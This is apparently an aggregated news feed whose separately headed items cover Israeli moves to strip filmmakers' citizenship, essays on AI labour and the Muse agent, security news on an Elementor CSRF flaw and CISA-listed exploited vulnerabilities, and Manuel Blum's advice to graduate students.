The revelation of the film’s existence — its world premiere was at the Venice Film Festival earlier this month after being produced in secret for three years — sent shockwaves through Israeli society. Two contradictory claims have begun to dominate discussions of the documentary, at the highest levels of both the Israeli government and the military brass, both aiming to neutralize the film’s reach and the ability of its filmmakers to continue working. The first is that the film released highly sensitive and classified information about the Israel Defense Forces’ operations in Gaza, contravening the law . The second line of attack claims the film is a complete fabrication, a hoax, and in the words of IDF Chief of the General Staff Eyal Zamir , a “blood libel.” Key Israeli politicians argue Abraham and Szor are aiding the enemy in wartime, with National Security Minister Itamar Ben-Gvir calling them “friends” of Hamas who should be held accountable as such.

While some opponents of the current Israeli government, such as Yashar leader Gadi Eisenkot, have attempted to tack in a more liberal direction by saying “criticism is legitimate” — while also decrying the film for “present[ing] a distorted and one-sided picture” at a time when “the State of Israel [is] in a time of distress” — both the Israeli state and the army have begun proposing legal action be taken against the filmmakers, with their citizenship in particular coming under attack from not only Culture Minister Miki Zohar, but Prime Minister Benjamin Netanyahu himself.

In an unprecedented move, Netanyahu announced on September 16 in a video message posted on social media that his government would “revoke citizenship from anyone who defames IDF supporters abroad” in addition to raising the fine for defamation “twentyfold” to 1 million shekels (nearly $330,000 at the current exchange rate) to punish them further. Calling out the “NAZA” filmmakers specifically, Netanyahu went on to say “their place does not belong with us.”

The phenomenon of revoking Israeli citizenship is not novel. Earlier this year, two Palestinians from East Jerusalem were convicted of security offenses and stripped of their Israeli nationality, which paved the way for their deportation to either the occupied West Bank or even the Gaza Strip. But revoking the citizenship of Israeli Jews on any kind of similar grounds is without historical precedent. Both Abraham and Szor — who also co-directed the documentary “ No Other Land ” — are Jews born in Israel, have no Palestinian ancestry, and no public record of citizenship for any other country.

Proposals have been made in the past for the revocation of Israeli citizenship from certain Jews, most notably Yigal Amir, who killed Israeli Prime Minister Yitzhak Rabin. The far-right assassin, who is from an Orthodox Jewish family, was the subject of a public petition demanding his citizenship be revoked. But the Israeli Supreme Court rejected it on the grounds that “the dignity of the right” for every Jew to acquire and have Israeli citizenship overruled the “dignity of the murderer.” Now, for the first time, a sitting Israeli leader is advocating for the so-called “dignity of the right” to be overturned, not for murder, but for mere “slander,” in Netanyahu’s description, against the Israeli military.

Although Israeli politicians and other officials have categorized the filmmakers as antisemites spreading lies about the Jewish people, Abraham and Szor are not explicitly anti-Zionist in the way that other prominent critics of Israel, like the historian Ilan Pappé and the architect Eyal Weizman, have defined themselves, or even how a Communist member of Israel’s Knesset, Ofer Cassif, has defined himself. Both co-directors have openly stated their belief in a future where both Israelis and Palestinians “ are equally sovereign and free .” Abraham himself has said Israelis have a “ right ” to “sovereignty and security in this land,” just as Palestinians do.

Despite these threaded needles, the Jewish filmmakers of “NAZA” now find themselves in the position of being treated much the same way Palestinian citizens of Israel are: as though their citizenship was bestowed upon them in error, a mistake of history where convenience trumped logic, a catastrophe that needs to be rectified immediately.

The Law of Return — the idea that every Jewish person, even those who converted to the religion and have no ancestral ties to the land of Palestine, should be allowed to “return” to their homeland, to settle, to live, and to be treated as an equal alongside every other Jewish person, no matter their birthplace — was one of the fundamental building blocks of the Zionist project. But the Law of Return did not become law until 1950, and the Citizenship Law, which defined the terms of its larger eligibility, did not become law until 1952, four years after the State of Israel’s founding.

For a short period in Israel’s history, citizenship had no clear definition, but it required quick clarification, not just because it is a key part of any fledgling state, but because they needed to be able to define which Arabs, who remained inside Israel’s new borders on temporary “red card” permits after the Nakba, could be allowed to stay, and who could be removed as an illegal infiltrator. Then-Agriculture Minister Dov Yosef remarked plainly during a cabinet debate in 1949: “When we publish the citizenship law and a person is found not to be a citizen, we can then deport him.”

Citizenship was granted in limited quantities to the Palestinians who had been able to remain inside the newly established Israel and did not confer all the rights it supposedly guaranteed. Palestinian citizens of Israel remained under control of a military governance system up until 1966, with their movements strictly controlled and their political activities restricted to rein in criticism of the Jewish state they now found themselves living under.

The discourse about citizenship has taken on an unmistakably Americanized character, one defined by a larger “Love it or leave it” mentality.

The Law of Return, considered “inalienable” by many politicians, where any concrete restrictions must entail tearing of the law in its entirety, contained seemingly contradictory restrictions within its formally expansive framework. Israeli Communist Party leader Meir Vilner noted back in 1950, during discussion of the Law of Return in the Knesset, that even though Jewish citizenship was technically expansive, it still entailed restrictions to those who “endangered … the security of the state,” a vagueness that Vilner opposed on the grounds that it could be used by the government “against sections within the Jewish people.” The Polish-Israeli anti-Zionist intellectual Israel Shahak noted in 1975 that all the punishments normally doled out against Arabs, including losing their citizenship, remained theoretically possible against Jewish dissenters under Israeli law, but only “racism” against Arabs had prevented setting that precedent.

As the United States became Israel’s primary benefactor in the 1960s and 1970s, previously dormant discussions about the grounds for revoking Israeli citizenship from Jews began to reemerge. They coalesced around insufficient connection to Israel, with some aiming to establish a system of permanent residency, disallowing citizenship for Jews who did not spend enough time inside the Jewish state. After 9/11, these proposals took on a much more ideological, and much more far-right, character.

The Israeli right was soon overtaken with the possibility of revoking the citizenship of those it considered to be aiding the enemy, with Arab citizens of Israel being the primary target. But anti-Zionist Jews were also in their crosshairs, including members of the ultra-Orthodox Jewish fringe sect Neturei Karta, or Jews who were insufficiently supportive of Israel, like Israeli journalist Gideon Levy. Calls for “loyalty oaths” from both Arabs and Jews became a cause célèbre for people like then-Deputy Prime Minister Avigdor Lieberman in the late 2000s, who would insist on the equality he advocated for by saying, “It’s not racism. The test is loyalty, not their religion.”

A certain McCarthyist strain familiar to Americans under the Bush administration, looking anywhere and everywhere for national disloyalty, was confirmed in 2007 by Likud MK Gilad Erdan, who would later become Netanyahu’s ambassador to the United Nations during the height of the war on Gaza in 2023. Erdan claimed revoking citizenship would not be wrong because the U.S. also had a basis for revoking citizenship based on “disloyalty to the state,” which included “citizens by birth,” and that there was a threat that needed to be dealt with, even from Jewish people inside the State of Israel, who did not recognize Israel’s “sovereignty.”

The Second Intifada and the disintegration of the so-called Israeli-Palestinian peace process preceded these events, but now, the discourse about citizenship has taken on an unmistakably Americanized character, one defined by a larger “love it or leave it” mentality that allows for officials like Ben-Gvir to post about putting Jewish and Arab politicians who oppose the unfettered expansion of Zionism on planes to be deported.

By virtue of their criticism of Israel, the self-proclaimed representative of the Jewish people, they become enemies of the Jewish people, and therefore in the minds of the state’s most ardent defenders, politically Arab, and therefore able to be viewed as an existential threat just the same.

Netanyahu’s proposal to strip the “NAZA” filmmakers of their citizenship is unlikely to come to pass. It is undeniably being utilized as a political cudgel, with Netanyahu also calling for the revocation of political opponent Yair Golan’s citizenship on the same grounds, despite Golan having been a major general in the IDF. Israeli President Isaac Herzog has, in turn, dismissed the plan, calling it “completely irrelevant.” But as Shahak said in 1975, the grounds for expanding the revocation of citizenship from Jewish Israelis is there in the law, even if the precedent has not yet been set. In 2022, the court upheld a law that allowed for revoking citizenship from Israelis who “carry out actions that constitute a breach of trust against the state.” Earlier this year, in a move met with much less controversy, Netanyahu began initiating proceedings to strip citizenship from those who allegedly aid Iran through espionage, cases which have involved Jews as well as Arabs.

While the chances of the Supreme Court upholding the stripping of citizenship in this particular case are almost nil, a future Israeli administration, one that does not recognize the court’s powers, or an administration that serves alongside a court far more aligned with disqualifying the insufficiently Zionist from politics, could tell a much different story.

A future government where Israel can strip anyone’s citizenship for not only being Palestinian, but also for speaking out in any way against the state , a future where Ben-Gvir is defense minister, or even prime minister, may be closer than many defenders of the “only democracy in the Middle East” imagine.

Commodified Intelligence

Lobsters
herecomesthemoon.net
2026-09-25 14:24:29
Comments...
Original Article
Travellers & Tinkers, CC BY-SA 4.0

I

Look, if you are still stuck on “AI cannot really think, it’s just a stochastic parrot”, please snap out of it and lock in, or you’ll keep repeating that line until you find yourself sitting in the corner chair, watching as ChatGPT™ has sex with your wife.

If you’ve paid attention to the HuggingFace hacking scandal and to what’s going on in mathematics , we’re well past the “stochastic parrot”, and have entered a world in which a sufficient amount of raw capital and verifiable constraints can solve complex problems.

The risk isn’t that the AI bubble is going to crash the markets, it’s that we’ll enter a world in which the value of human intellectual labor will rapidly go down to minimum wage (or worse).

You may believe that you can do better web development than Claude, but that won’t stop Big Capital from cutting half of the jobs at your company in favor of cheaper meat proxy AI-assisted labor.

Ignoring extinction and singleton risks, the bare minimum you should be horrified of is a commodification of intelligence , and what that means in a world with an uneven distribution of power and resources.

Commodified Intelligence.

That’s the phrase I’ve been trying to put a finger on for a while now.

The reason why dead-end so-called unskilled labor sucks is that you are fundamentally replaceable. The market enforces a pretty brutal equilibrium. White-collar jobs suck less because you are less replaceable, and maybe even get to convince yourself that your work matters , either for yourself or for society. You have some narrative arc attached to it that just isn’t there if you’re completely replaceable.

Quoting the single best post of all time:

Minimum wage jobs are worse because of their pointlessness more than because of their indignity, work harder/better/faster/stronger and no one cares, screw up and you’re replaced without a missed beat. No direction, no story; the days blur together until arthritis leaves you crippled.
— The Tower – Hotel Concierge

Whether you have a white-collar job or not, commodified intelligence fundamentally makes workers more replaceable, and this is bad for them .

It doesn’t matter that we’re all subjected to horrible AI-generated slop food posters as long as the margins are positive. It doesn’t matter that some diffuse component of quality, or a human touch are missing. Not as long as the margins are positive.

The same argument applies to vibecoding. Avoiding it may be better for your brain, and projects like Zig may excel without AI usage due to a strong vision, willingness to put in the work and community support, but the average SWE is still going to suffer the consequences of a commodification of intelligence. The average SWE doesn’t work on projects where such a strong vision is even necessary.

Why should you do your own coding? Either because you care strongly about the act itself and want to avoid losing your skills, or because you have such a strong vision that handing over control to the commodified intelligence machine will inherently compromise what you are trying to achieve.

Both of these are fair points, but understand that they are different arguments: One is about what’s good for yourself, the other is an argument about quality, which may end up harder to justify as AI capabilities increase.

In either case, the market will neither care about you, nor about which tools you used to get somewhere. That’s capitalism, baby. The “economic reality” will adjust itself around you, whether you like it or not.

II

Automation has happened many, many times throughout history.

“Employment of young workers (ages 22–25) in AI-exposed occupations now stands 19% below where it would be had it kept pace with that of their less-exposed peers; experienced workers show no comparable gap.”
— Canaries in the Coal Mine? Six Facts about the Recent Employment Effects of Artificial Intelligence, August 2026 Revision

(You don’t need to tell me that it says “experienced workers show no comparable gap”. The paper is called ‘Canaries in the Coal Mine’ for a reason. Entry-level workers get hit first.)

An automation of general-purpose pattern matching and problem solving is scary since it’s a whole phase change: It automates “everything” which, at worst, leaves us in a world in which raw access to capital/compute is all that matters to determine your leverage.

The thing that makes me especially squeamish about this is that there’s a reasonable case to be made that all of human flourishing within democratic societies rests on a fundamental stabilizing pillar that says “THE MATERIAL VALUE OF SPECIALIZED HUMAN LABOR”. ( CGP Grey’s Rules for Rulers continues to be relevant.)

This is a dark, grotesque, almost Landian point: If intelligence, and raw problem solving has been commodified, you really don’t rely on human labor anymore. All you need is raw capital, and some sort of vision of what you want.

Yes, robotics aren’t quite there yet, but labs and startups across the world are racing towards it, and in the meantime we’ve got reverse centaurs to do the job. Putting up the factories may take a while, but it’s essentially inevitable once we’re at the point of commodified intelligence.

If you don’t have the ability to contribute through productive labor, capital owes you nothing, and you’ve lost the most important leverage you had access to.

Yes, yes, you are allowed to identify the concentration of capital as the problem, but please for the love of god, arms-race-type problems are structural in nature, and the train is moving too fast: Swarms of AI agents will be hacking, piloting robots and researching in automated biolabs before you have any chance to overthrow society and establish a socialist utopia.

I know: Working from within the system is perhaps even less likely to work, leaving you with approximately zero options whatsoever 1 .

If any of these things shake out and we make it out of the near-future, the best you can hope for is a universal basic income, pegged to a meaningful percentage of existing compute 2 . (To avoid the risk of compute-inflation.)

III

If we (humanity) make it out of the near-future meltdown world and the first few incidents caused by AI-manned biolabs , you’ll live in a world in which AI will do your job better than you do. Taste and vision may still matter, but all skills have to be honed for their own sake, or for local enjoyment.

Consider: You live in a world in which chess is thoroughly, and utterly dominated by The Machine, yet humanity still plays chess. Good chess, bad chess, the act itself is still enjoyable.

Why is it enjoyable?

Because it’s hard. It’s a mountain to climb. There are mountains everywhere for those with eyes to see, so you certainly don’t have to climb this specific one, but everyone knows that the difficulty and uncertainty is at least part of what makes chess enjoyable.

We can figure out later whether struggle for its own sake is enough, or whether nihilism had a point. For now we can agree that there’s no point to having Stockfish play chess for you.

If ChatGPT™ were better at sex than you, should ChatGPT™ have sex with your wife instead of you?

No! The point of sex isn’t to do it well . You should do it for yourself, and because you care about doing it yourself! Or care about doing it with other people, lest we ignore the social component of sex (or chess, as the case may be).

In a hypothetical post-near-future world, slop will certainly still exist.

If we’re lucky, and the future has an inkling of post-scarcity in it, then most low-effort AI-generated “““content””” will just be downstream of poor taste, at least (rather than being an attempt to scam people).

You may call it “slop”, and sneer in disdain at low-skilled bad-taste dilettantes flooding the internet with trash, but we already live in that world, anyway: Most things are bad , which is why all the big platforms are huge on personalized algorithms, and also why recommendations by your friends are valuable.

My prediction is that we’ll move even further into a bifurcated economy, as is already the case for music: There’s committee-produced music whose purpose is to turn a profit, and there’s music created by indie artists who know that they have no hope of ever making music their primary source of income. (Just look at indie games!)

We may end up with a full “hidden economy”: People working on their own passion projects, building things for their own sake, and for recognition from their peers. Work done without real compensation, to express personal ideas, moods, and visions, with personal lines drawn on when AI usage is acceptable, and when it isn’t.

This bifurcation would affect everyone. For every single hobby activity in your life you’ll have to make a decision: Do you care about the “outcome”, or do you care about doing it yourself, about going through the steps, learning, and doing it badly?

Say, do you just want to eat something, or do you want to know how to cook?

Do you just want a drawing, or do you want to learn how to express yourself in art, in a way that’s impossible to articulate or explain through a chat interface?

Everyone will have to make the call about what they care to do on their own, and where they’re happy handing over control to AI assistants. Asking people not to use any AI whatsoever is going to be unrealistic (and impossible, in the sense that the rest of the economy will be fueled by it).

Still, in a world in which technology has evolved to exploit our attention and addictions, it’s more critical than ever that you draw that line somewhere, take time for deep focus, and do things for your own sake.

Again: This is already the case. Whenever you play a video game (say, Elden Ring) and decide to ‘play it blind, unspoiled, and without looking anything up’, you are acknowledging that taking ’the hard way’ or having an ‘authentic experience’ is more important for you than raw success.

Don’t be a meat proxy, don’t get stuck in the feedscroller apps, and don’t cheat (at chess, at writing, or otherwise).

★ I’ll Wait

Daring Fireball
daringfireball.net
2026-09-25 14:16:47
I wouldn’t grant a stranger access to my email. So why would I grant a robot?...
Original Article

It’s Friday, and Muse is still the #1 app in the iOS App Store — that’s a full week in the top spot. Who knows if it’s a flash in the pan or not. (Remember Clubhouse ? Sora ?) But at the moment it’s clearly a hit. It certainly helps that Meta itself is promoting Muse heavily on their own channels like Instagram and Facebook.

But the Muse iOS app is sandboxed — because it has to be. So that’s the only version I’m personally tinkering with. But the Mac app is the more powerful one, because, well, it lets Muse drive your Mac. But the fact that the Muse Mac app is so powerful is why it has to be downloaded from the web. It’s not in the Mac App Store because apps that do what the Muse Mac app does aren’t permitted in the Mac App Store. There are a lot of good reasons why good Mac developers have long been frustrated by those rules. (Users too.) But the upside of Apple’s restrictive Mac App Store policies is that users can blindly install apps from the Mac App Store and trust that those apps cannot run amok on their system.

The way I think about running an agentic AI on my Mac is simple. I would never let an unknown person use my Mac. Not even for a minute, not even with me watching them. Let alone letting them use it nonstop, without my watching them. I’d be uncomfortable letting even a trusted friend use my Mac, logged into my user account. So why would I let an AI robot, no matter the source? It doesn’t even get to the point of my considering Meta as Muse’s creator. I wasn’t tempted an iota to try OpenClaw, and I’m not tempted to try Muse on my Mac. On a Mac, maybe. But not my Mac.

Same thing for granting Muse — running in the cloud, not on my Mac — access to my email, or calendar, or banking. I wouldn’t grant a stranger access to my email. So why would I grant a robot? But my refusal to grant Muse access to anything like that means that it’s basically just a toy for me to poke at.

A lot of people hire personal assistants — humans — and give them access to their email (and calendar, files, bank accounts, etc.). I’ve never done that, but I’ve long considered it. I see the appeal. But if I hired a personal assistant, I’d get to know them first. Develop some trust. My time is valuable, but not as valuable as my comfort, and I’d be excruciatingly uncomfortable giving anyone — or anything — I didn’t trust access to my life. I’m not saying I will never grant access to such things to an AI agent. In fact, I bet that sooner or later I will, to some carefully measured extent. But not now.


One of my favorite teachers in high school was a history teacher named Gary Choyka. I had him for morning homeroom too, and I loved that he had a daily subscription to The Philadelphia Inquirer, a real newspaper, not just our Podunk suburban rag. Mr. Choyka was a great teacher, full stop. I learned a lot about the world, and a ton about our civil rights and liberties here in the U.S. from him. It was from Mr. Choyka that I learned that you do not have to allow the police to enter your home just because they’re at the door claiming that they’re going to enter the home. That came in handy at some high school parties (and made me the designated knock-at-the-door answerer).

Part of what made Mr. Choyka a great teacher is that he had a wonderful presence, a mastery of the classroom. And he had one devastatingly effective technique. If he was giving a lecture and a bit of chatter between students grew to the point of even slight disruption, he’d just stop talking, mid-sentence, stare at the chattering students, and after waiting a few beats, say, “I’ll wait.”

Having been the disruptive whisperer more than once, I still feel small thinking about that phrase. It was like getting zapped by Rick Moranis’s kid-shrinking machine. Thirty-some years later and I can still hear him saying it. I’ll wait. It worked because he meant it. He wasn’t going to compete for attention.

It’s not really an analogous situation at all. But somehow it’s Mr. Choyka’s signature line that comes to mind when I ponder how I feel about AI agents — at least the sort of ones like Muse that want control over my personal computing, and really, personal life. I’ll wait.

Elementor WordPress flaw lets attackers create admin accounts

Bleeping Computer
www.bleepingcomputer.com
2026-09-25 14:13:33
A cross-site request forgery (CSRF) vulnerability in the Elementor plugin for WordPress could allow an unauthenticated attacker to create administrator accounts. [...]...
Original Article

Elementor WordPress flaw lets attackers create admin accounts

A cross-site request forgery (CSRF) vulnerability in the Elementor plugin for WordPress could allow an unauthenticated attacker to create administrator accounts.

Threat actors can exploit the flaw by tricking a logged-in administrator into opening a malicious link, causing the victim's authenticated session to perform a REST API action permitted by their account.

On default installations, the result is the creation of an administrator account under the control of the attacker.

The Elementor Website Builder is a popular WordPress plugin active on 10 million websites that lets users create websites using a drag-and-drop interface.

The CSRF flaw has yet to receive an identifier and impacts only versions 4.3.0 and 4.3.1. According to statistics from WordPress.org, the two versions are used by up to 2 million sites .

Security firm Patchstack reported the vulnerability to the Elementor team on September 22 after receiving it from bug hunter “Saggre.” Elementor released a fix two days later, in version 4.3.2 of the plugin.

According to Patchstack’s analysis, the CSRF flaw is caused by Elementor’s Editor Events module checking the raw request URI for the elementor/v1/events/ path and bypassing WordPress’s REST nonce validation when that string is present.

Because the URI also contains attacker-controlled query parameters, attackers can append the path to requests targeting other REST endpoints and trick logged-in users into executing them with their existing privileges.

Patchstack says the flaw can be abused in one-click attacks against a logged-in administrator to create a new attacker-controlled admin account.

“One link, opened by a logged-in WordPress user, makes that user carry out any REST API action their account is permitted to perform,” Patchstack explains .

The security firm says that the attack does not require JavaScript, an attacker-controlled webpage, or a submitted form, and the link can be delivered to the target via email, a chat message, or a comment on the site.

Elementor releases before 4.3.0 do not contain the affected Editor Events proxy, but those older versions are vulnerable to other flaws, some of which are already actively exploited .

Users of the plugin are recommended to upgrade to Elementor version 4.3.2 as soon as possible, which prevents attackers from triggering the bypass through the query string.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

CISA warns of Sharepoint, WSO2, Adobe Commerce flaws exploited in attacks

Bleeping Computer
www.bleepingcomputer.com
2026-09-25 13:24:20
The Cybersecurity and Infrastructure Security Agency (CISA) warns that hackers are exploiting a critical authentication bypass vulnerability (CVE-2026-5430) affecting multiple products from enterprise software provider WSO2. [...]...
Original Article

CISA warns of Sharepoint, WSO2, Adobe Commerce flaws exploited in attacks

The Cybersecurity and Infrastructure Security Agency (CISA) warns that hackers are exploiting a critical authentication bypass vulnerability (CVE-2026-5430) affecting multiple products from enterprise software provider WSO2.

The agency also added CVE-2026-71362, another critical-severity flaw affecting Adobe Commerce, to the list of security issues being leveraged in attacks.

Hackers are also exploiting two additional vulnerabilities: a high-severity code injection flaw in Microsoft SharePoint tracked as CVE-2026-65660, and a medium-severity pre-authentication SSH state-machine/workflow bypass in Mikrotik RouterOS identified as CVE-2026-67279.

For the two critical issues added to the Known Exploited Vulnerabilities ( KEV ) catalog, federal agencies using the affected products have until  Sunday, September 27, to apply the recommended updates or mitigations, or discontinue their use.

The CVE-2026-5430 flaw received a maximum severity score and impacts WSO2 API Manager versions 4.1.0 through 4.6.0, API Control Plane, Traffic Manager, and Universal Gateway versions 4.5.0 and 4.6.0.

In the original advisory on May 3 , the vendor says that an attacker successfully exploiting the vulnerability could compromise administrative accounts and take full control.

The problem stems from the JWT authentication mechanism accepting tokens signed with an unsupported algorithm.

CISA has not shared any details about the attacks, but security firm watchTowr announced on September 15 announced that its honeypots captured exploitation attempts.

The researchers said they observed a limited number of attempts from one IP address on September 13 using forged JWT tokens against a WSO2 product. However, the attacker targeted the wrong product for CVE-2026-5430.

watchTowr reproduced the attack on the correct product, where a forged token could expose API endpoints and application credentials.

Yordan Ganchev, threat intelligence specialist at watchTowr, told BleepingComputer that WSO2 is not a niche target.

“Its technology is used by nearly 1,000 customers across banking, government, telecommunications, and logistics,” explained Ganchev.

“Organizations in these sectors can't afford to wait for exploitation to be formally confirmed.”

The second critical-severity bug added to the KEV is CVE-2026-71362, an incorrect authorization vulnerability in Adobe's Commerce and Magento e-commerce platforms.

Ecommerce security company Sansec observed CVE-2026-71362 being exploited in the wild, saying that threat actors require "no existing account, administrator privileges, or user interaction" to leverage it.

The deadline for federal agencies to mitigate both vulnerabilities is September 27, but CISA encourages all organizations to take action and prioritize addressing the security issues listed in the KEV.

For the Microsoft SharePoint and Mikrotik RouterOS flaws, CISA is giving agencies until Monday, September 28 to fix them.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

Quoting John Gruber

Simon Willison
simonwillison.net
2026-09-25 13:22:01
Muse is getting a lot of attention — including mine — because it’s both groundbreaking technically (each user gets their own entire persistent Linux VM running in Meta’s cloud) and because it’s packaged in an easy-to-install easy-to-use way. It’s literally presented as a cute mascot. It’s the first ...
Original Article

25th September 2026

Muse is getting a lot of attention — including mine — because it’s both groundbreaking technically (each user gets their own entire persistent Linux VM running in Meta’s cloud) and because it’s packaged in an easy-to-install easy-to-use way. It’s literally presented as a cute mascot . It’s the first consumer-accessible agentic AI system, and Meta has truly done an amazing job with that. But it’s a genuinely open question whether consumers have any understanding what this means. If you buy a power saw that can cut your fingers off, you are almost certainly aware that you are buying a power saw that can sever your fingers. [...] I don’t think people realize how powerful — and thus dangerous — Muse is, especially if it’s running on your Mac.

— John Gruber , Muse Looks Cute, but Looks are Deceiving

Regarding the Provenance of Charm Within Meta

Daring Fireball
www.bloomberg.com
2026-09-25 13:07:33
Mark Gurman, reporting for Bloomberg Wednesday, after Meta’s 2026 Connect keynote (gift link): Meta Platforms Inc. unveiled a palm-sized, dedicated gadget for using Muse, the company’s popular new artificial intelligence assistant, pushing deeper into the AI devices market with a surprise announ...
Original Article

We've detected unusual activity from your computer network

To continue, please click the box below to let us know you're not a robot.

Why did this happen?

Please make sure your browser supports JavaScript and cookies and that you are not blocking them from loading. For more information you can review our Terms of Service and Cookie Policy .

Need Help?

For inquiries related to this message please contact our support team and provide the reference ID below.

Block reference ID:06398542-b904-11f1-8527-074bc359fe3a

Get the most important global markets news at your fingertips with a Bloomberg.com subscription.

SUBSCRIBE NOW

Advice to a Beginning Graduate Student (2001)

Hacker News
www.cs.cmu.edu
2026-09-25 15:12:45
Comments...
Original Article

Advice to a Beginning Graduate Student
or
What is Research?
or
The 4 R's of Graduate School:
Reading, Rithmetic, Research, and Writing


Outline of the talk:

READING , STUDYING , THINKING ,
STARTING OFF on the PhD ,
DEEP in the MIDDLE of the PhD ,
WRITING it all up .
YOU


READING:
Books are not scrolls.
Scrolls must be read like the Torah from one end to the other.
Books are random access -- a great innovation over scrolls.
Make use of this innovation! Do NOT feel obliged to read a book from beginning to end.
Permit yourself to open a book and start reading from anywhere.
In the case of mathematics or physics or anything especially hard, try to find something anything that you can understand.
Read what you can.
Write in the margins. (You know how useful that can be.)
Next time you come back to that book, you'll be able to read more.
You can gradually learn extraordinarily hard things this way.

Consider writing what you read as you read it.
This is especially true if you're intent on reading something hard.

I remember a professor of Mathematics at MIT,
name of BERTRAM KOSTANT,
who would keep his door open whenever he was in his office, and he would always be at his desk writing.
Writing. Always writing.
Was he writing up his research? Maybe.
Writing up his ideas? Maybe.
I personally think he was reading, and writing what he was reading.
At least for me, writing what I read is one of the most enjoyable and profitable ways to learn hard material.


STUDYING:
You are all computer scientists.
You know what FINITE AUTOMATA can do.
You know what TURING MACHINES can do.
For example, Finite Automata can add but not multiply.
Turing Machines can compute any computable function.
Turing machines are incredibly more powerful than Finite Automata.
Yet the only difference between a FA and a TM is that
the TM, unlike the FA, has paper and pencil.
Think about it.
It tells you something about the power of writing.
Without writing, you are reduced to a finite automaton.
With writing you have the extraordinary power of a Turing machine.

THINKING:
CLAUDE SHANNON once told me that as a kid, he remembered being stuck on a jigsaw puzzle.
His brother, who was passing by, said to him:
"You know: I could tell you something."
That's all his brother said.
Yet that was enough hint to help Claude solve the puzzle.
The great thing about this hint... is that you can always give it to yourself !!!
I advise you, when you're stuck on a hard problem,
to imagine a little birdie or an older version of yourself whispering
"... I could tell you something..."

I once asked UMESH VAZIRANI how he was able,
as an undergraduate at MIT,
to take 6 courses each and every semester.
He said that he knew he didn't have the time to work out his answers the hard way.
He had to find a shortcut.
You see, Umesh understood that problems often have short clever solutions.


There will come a time when you work on a problem long and hard but UNsuccessfully :(
And then you learn that someone else found a solution.
See this as the GREAT opportunity it is to learn something important.
Don't let it pass you by.
Ask yourself: "How SHOULD I have been thinking to solve that problem?"
I have found that doing so is a powerful exercise.
Danny Sleator tells me that BOB FLOYD independently recommended exactly this exercise to his students.
He would lead them into asking themselves:
"How COULD I have led myself to that answer?"
Take the time to think it through.
It's worth it.

There will come a time when you work on a problem long and hard and SUCCESSFULLY :)
And then you learn that someone else already published. :(
Hard as that may be for you to take, you must view this too as a great opportunity.
Don't turn off. Read what got published.

You will be surprised how often the published paper turns out to be different in some significant way. Roughly
50% of the time, it is NOT at all the same as what you did.
25% of the time, it is the same but not as good.
25% of the time it is better.

This means that 50% of the time or more, you can still publish.

And what about the 25% time that what got published is better than your own?
In that case, you have a great opportunity to learn.
Ask yourself: "How SHOULD I have been thinking to solve the problem in this fine way?"

This is how I discovered, as a young engineer, that I should learn something enormously powerful called "Modern Algebra."
It's one reason I switched from Electrical Engineering as an undergraduate major to Mathematics as a Graduate major.
Of course, this was before there existed anything called Computer Science.


Still on THINKING...
The importance of PARADOX and CONTRADICTION.
When you can prove that a statement S is true,
and you can prove that the same statement S is false,
then you KNOW that that you're on to something:
Something is wrong somewhere.
Never underestimate the power of a contradiction.
It is one of our most potent sources of knowledge.

Examples include the Liar Paradox "This statement is false." with its applications to Set Theory and our understanding of language.
There are the seeming paradoxes of countability and uncountability,
In CS, there is the apparent paradox that leads to The Halting Problem.
Physics has lots of paradoxical material:
Quantum Theory. The Einstein-Rosen-Podulsky Paradox.
The relativistically speeding Twins.
The wave and particle nature of matter.

Here's an ASIDE on my current work, also based on paradox:
I am personally interested in the Paradox of consciousness. Compare the following two views:
1. the view that the human is a MECHANISM, an automaton
with substantial but finite internal memory, programmed like
any computer to do whatever it does, and/or
2. the view that the human is a thoughtful observant
creature with a God-like free will; that it is a CONSCIOUS
ENTITY at the controls of a highly complex highly capable
mechanism, choosing what to do from among options served up
by/from its vast unconscious below.

In my view, both these views are correct. How can that be?

In his "Life of Johnson," James Boswell quotes Samuel Johnson
as saying:
"All theory is against the freedom of the will; all experience
is for it."
Johnson was 18 years old when Newton (age 85) was buried.
Johnson knew that F=MA implied that humans are mechanisms.

"All theory is against the freedom of the will; all experience
is for it."

This ends my ASIDE.

Make a list for yourself of good ways to pursue a problem.
My own favorite is to try small examples. By comparison,
DAVID GRIES's favorite is to put himself in the middle
of a (presumed) solution. An example is his coffee can problem:
Given a can of black and white coffee beans, do the following: Pull out two beans: if both are the same color, replace them with a white bean. If the two are different, replace them with a black bean. What color is the last bean?

Or try out the two methods on the Hershey Bar problem
[Give an optimal algorithm to break an mxn Hershey bar into
1x1 pieces. At each step, you can choose a single rectangle
of chocolate and crack it along one of its vertical or
horizontal lines. A single crack counts one step. You are to
make the fewest number of cracks]

Brains are muscles.
They grow strong with exercise.
And even if they're strong, they grow weak without it.
In the months before Kasparov lost to Deep Blue,
his mother came after him.
She was worried that he wasn't spending enough time
exercising himself (on chess).
Her worries proved well-founded.

THE PhD: GETTING STARTED
I remember a great summer job I once had at IVIC
(Instituto Venezolano de Investigaciones Cientificos).
A top neurophysiologist, name of Svaetichin, gave me a splendid problem... one that I unfortunately could not solve.
The problem was to find a way to focus light on a single cell
of a goldfish retina so that the light would not spill over
onto any of the adjacent cells.
Svaetichin had tried making a pinhole in a sheet of black tin,
and shining his light thru the hole. This worked for moderate size holes, but failed for really small holes, which caused the light to diverge, to form diffraction patterns.

Since Svaetichin couldn't solve the problem, I decided I couldn't. Or perhaps it's that I thought his problem physically unsolvable. In retrospect, I should have taken out books on physics, especially optics, read as much as I could, talked to others and kept on talking to him.
Svaetichin would have helped me if I had shown him I was reading thinking working.

Don't expect your thesis advisor to give you a problem that he or she can answer. Of course, she might.
* She might give you a problem to which she already knows an answer.
* She might give you a problem that she thinks is answerable,
but that she hasn't actually answered.
* She might give you a problem that is deadly hard.
* If the problem she gives you is hard enough,
I suggest you look for a NONSTANDARD answer.
More on this later after I get done cooking the thesis advisor.

Your thesis advisor may encourage you to work in an area
that she feels completely comfortable in... in which case you can rely on her for sage advice and sound guidance.
Or she may encourage you to work on something she knows little or nothing about, in which case it will be up to you to inform and teach her.
In the latter case, you will have to learn all you can for yourself...
You will have to learn from other faculty, from courses, from books, from journals. from peers.
Both kinds of advisors can work out for you.
I don't know that one is necessarily better than the other.
